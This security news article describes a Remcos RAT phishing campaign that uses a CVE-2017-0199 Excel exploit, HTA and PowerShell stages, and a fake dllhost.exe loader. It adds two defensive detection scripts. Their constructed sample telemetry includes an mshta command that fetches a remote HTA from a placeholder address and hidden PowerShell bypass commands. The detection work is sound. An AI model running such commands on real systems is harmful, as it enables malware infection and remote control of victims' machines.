A new variant of the Remcos RAT malware, capable of taking complete control over a victim’s device, has been uncovered in a recent phishing campaign targeting Windows users.
Discovered by Fortinet’s FortiGuard Labs, this campaign uses a phishing email with a malicious Excel attachment to deliver the malware to victims, exploiting a known and long-patched Office vulnerability to run its code without the user doing anything beyond opening the file.
Once opened, the Excel file triggers CVE-2017-0199, a 2017 Microsoft Office flaw in OLE object handling that lets a document fetch and run remote content, and uses it to download an HTML Application (HTA) file. Windows runs the HTA with mshta.exe; the HTA in turn runs further scripts that download an executable named “dllhost.exe,” the same name as the legitimate Windows COM Surrogate binary. That file is a loader which installs the Remcos RAT, giving the attackers remote control of the infected system.
Layers of Obfuscation in Remcos RAT
The Remcos RAT variant leverages multiple layers of obfuscation to avoid detection. The malicious code is wrapped in nested layers of script and encoded text, including JavaScript, VBScript and PowerShell, each of which must be unwrapped before the actual payload becomes visible.
Once dllhost.exe is running, it executes PowerShell commands to launch additional files it has hidden on the victim’s device, embedding the malicious program more deeply in the system. The variant also uses anti-analysis techniques that hinder automated scanning and make manual reverse engineering slow and error-prone.
Among these anti-analysis techniques are vectored exception handlers (which divert control flow through deliberately triggered exceptions, confusing debuggers and disassemblers), dynamic API resolution (so the functions the malware calls never appear in its import table) and encoded constants, all of which frustrate static code analysis.
The malware also performs process hollowing: it starts a legitimate program in a suspended state, replaces that process’s memory with its own code, then resumes it. The result is a process that carries a trusted name in the task list while actually running the malware.
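The delivery chain described above (Excel exploiting CVE-2017-0199, mshta.exe, further scripts, a dllhost.exe loader and its PowerShell stage) leaves a distinctive parent/child trail in endpoint telemetry. The following detection logic is an added example, not code from Fortinet’s report; it assumes Sysmon Event ID 1 (process creation) exported as JSON lines with the fields ProcessId, Image, ParentProcessId, ParentImage and CommandLine, and the sample events it runs over are constructed, not captured from a real infection.

```python
"""Flag the Remcos delivery chain in process-creation telemetry.

Added example, not code from Fortinet's report. Assumes Sysmon Event ID 1
exported as JSON lines with ProcessId, Image, ParentProcessId, ParentImage
and CommandLine. All events below are constructed."""
import json
import ntpath

# Constructed telemetry: a benign Excel launch, the chain from the article,
# and a legitimate COM Surrogate (dllhost.exe in System32) for comparison.
SAMPLE_EVENTS = r"""
{"ProcessId": 4120, "ParentProcessId": 3000, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"EXCEL.EXE\" invoice.xlsx"}
{"ProcessId": 4133, "ParentProcessId": 4120, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "CommandLine": "mshta.exe http://203.0.113.5/stage.hta"}
{"ProcessId": 4140, "ParentProcessId": 4133, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "powershell.exe -w hidden -ep bypass -enc ..."}
{"ProcessId": 4155, "ParentProcessId": 4140, "Image": "C:\\Users\\victim\\AppData\\Roaming\\dllhost.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "C:\\Users\\victim\\AppData\\Roaming\\dllhost.exe"}
{"ProcessId": 4160, "ParentProcessId": 4155, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Users\\victim\\AppData\\Roaming\\dllhost.exe", "CommandLine": "powershell.exe -w hidden -ep bypass -c ..."}
{"ProcessId": 5010, "ParentProcessId": 900, "Image": "C:\\Windows\\System32\\dllhost.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "C:\\Windows\\System32\\dllhost.exe /Processid:{...}"}
"""

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Directories where the real dllhost.exe lives (lower-cased for comparison).
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def load_events(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path):
    # ntpath handles Windows paths regardless of the host OS.
    return ntpath.basename(path).lower()


def in_system_dir(path):
    return ntpath.dirname(path).lower() in SYSTEM_DIRS


def detect(events):
    """Return one finding per matching rule; the rule name doubles as the alert title."""
    findings = []
    for ev in events:
        image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        pid = ev["ProcessId"]
        # Stage 1: an Office application launching a script host (CVE-2017-0199 -> mshta.exe).
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            findings.append({"pid": pid, "rule": "office_spawned_script_host", "cmd": ev["CommandLine"]})
        # Stage 2: mshta.exe spawning anything at all is rare on a workstation.
        if parent == "mshta.exe":
            findings.append({"pid": pid, "rule": "mshta_spawned_child", "cmd": ev["CommandLine"]})
        # Stage 3: a binary named dllhost.exe running from outside the Windows system directories.
        if image == "dllhost.exe" and not in_system_dir(ev["Image"]):
            findings.append({"pid": pid, "rule": "dllhost_outside_system_dir", "cmd": ev["CommandLine"]})
        # Stage 4: that rogue dllhost.exe launching PowerShell for the next stage.
        if parent == "dllhost.exe" and image in POWERSHELL and not in_system_dir(ev["ParentImage"]):
            findings.append({"pid": pid, "rule": "rogue_dllhost_spawned_powershell", "cmd": ev["CommandLine"]})
    return findings


def ancestry(events, pid):
    """Walk ParentProcessId links back to the root for triage.

    Ignores PID reuse, which real tooling must handle by also matching on
    process creation time or Sysmon's ProcessGuid."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    names = []
    ev = by_pid.get(pid)
    while ev is not None:
        names.append(basename(ev["Image"]))
        parent = by_pid.get(ev["ParentProcessId"])
        if parent is None:  # parent was created before collection started
            names.append(basename(ev["ParentImage"]))
        ev = parent
    return names


if __name__ == "__main__":
    evs = load_events(SAMPLE_EVENTS)
    for f in detect(evs):
        print(f["rule"], f["pid"], " <- ".join(ancestry(evs, f["pid"])))
```

Each rule fires on its own stage, so even if an attacker changes one link (a different script host, a differently named loader) the remaining rules still catch the rest of the chain; the ancestry walk then ties the alerts back to the Excel process that started it.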
Remcos RAT Advanced Control Features
Remcos RAT enables attackers to maintain long-term control over compromised devices. The malware adds registry entries so that it is relaunched after the device is restarted. Once fully installed, it communicates with a command-and-control (C2) server, receiving instructions for operations that include keylogging, remote screenshots and audio recording.
The malware carries an encrypted configuration block, which it decrypts at runtime to determine how it behaves on a victim’s device. The configuration includes the IP address and port of the C2 server and settings that enable specific capabilities within Remcos, such as monitoring system processes and retrieving device data.
Each command is stored encrypted and decrypted only when needed, so analysts cannot simply read the command set out of a static sample; recovering it requires running the malware or reimplementing its decryption routine.
In addition to monitoring, Remcos RAT collects device information and user activity, which it encrypts and sends back to its C2 server. The channel is wrapped in TLS, which hides the content of the traffic from network inspection and keeps a reliable connection open to the attackers.
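The registry persistence mentioned above is something responders can audit directly. The script below is an added example, not code from Fortinet’s report or from Remcos itself; it assumes the common form of this technique, an entry under a CurrentVersion\Run key, and works on a text export of the key (the output of `reg export`) rather than the live registry, so it runs anywhere. The export it parses is constructed for illustration.

```python
"""Audit Run/RunOnce entries from a .reg export for RAT-style persistence.

Added example, not code from Fortinet's report. Assumes the persistence
takes the common form of a CurrentVersion\Run value; the export below is
constructed, including the rogue dllhost.exe entry."""
import ntpath
import re

SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\System32\\SecurityHealthSystray.exe"
"dllhost"="\"C:\\Users\\victim\\AppData\\Roaming\\dllhost.exe\""
"Updater"="mshta.exe C:\\Users\\Public\\update.hta"
"""

# Script hosts and LOLBins that rarely belong in an autostart entry.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "pwsh.exe", "cmd.exe", "regsvr32.exe", "rundll32.exe"}
# Names of Windows system binaries that malware borrows to blend in.
SYSTEM_BINARIES = {"dllhost.exe", "svchost.exe", "explorer.exe", "conhost.exe",
                   "lsass.exe", "csrss.exe"}
# Path fragments a non-admin user can write to (lower-cased).
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\temp\\", "\\programdata\\")
WINDOWS_DIR = "c:\\windows\\"

# .reg files escape a backslash as \\ and a double quote as \".
_VALUE_LINE = re.compile(r'"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape(s):
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Return {key_path: {value_name: data}} for the string values in a .reg export."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            m = _VALUE_LINE.match(line)
            if m:
                keys[current][_unescape(m.group(1))] = _unescape(m.group(2))
    return keys


def executable_of(command):
    """Extract the program from a Run value: quoted path or first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def audit_run_key(values):
    findings = []
    for name, command in values.items():
        exe = executable_of(command)
        base = ntpath.basename(exe).lower()
        low = exe.lower()
        reasons = []
        if base in SCRIPT_HOSTS:
            reasons.append("script_host")
        # Note: legitimate per-user installers (OneDrive, Teams) also live under
        # AppData, so in production this rule needs an allow list of known hashes.
        if any(marker in low for marker in USER_WRITABLE):
            reasons.append("user_writable_path")
        if base in SYSTEM_BINARIES and not low.startswith(WINDOWS_DIR):
            reasons.append("system_name_outside_windows_dir")
        if reasons:
            findings.append({"name": name, "command": command, "reasons": reasons})
    return findings


def audit_export(text):
    """Audit every Run and RunOnce key found in the export."""
    findings = []
    for key, values in parse_reg_export(text).items():
        if key.lower().endswith(("\\currentversion\\run", "\\currentversion\\runonce")):
            for f in audit_run_key(values):
                findings.append({"key": key, **f})
    return findings


if __name__ == "__main__":
    for f in audit_export(SAMPLE_REG_EXPORT):
        print(f["name"], f["reasons"], f["command"])
```

On a live host the same logic can be fed from `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg` (and the HKLM equivalent); the flagged dllhost entry is exactly the pattern the article describes, a system binary name launched from a user-writable directory.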
To protect against malware like Remcos RAT, companies should keep antivirus and anti-malware software up to date so that known samples are detected, employ web filtering to block access to known-malicious URLs and enable spam filters to catch phishing emails before they reach users.
Keeping all software patched, which on its own blocks the CVE-2017-0199 exploit used here, and deploying intrusion prevention systems (IPS) and content disarm and reconstruction (CDR) tools is also advised for additional security. Finally, regular security awareness training helps users recognise and avoid phishing schemes.
Image credit: Diego Thomazini / Shutterstock.com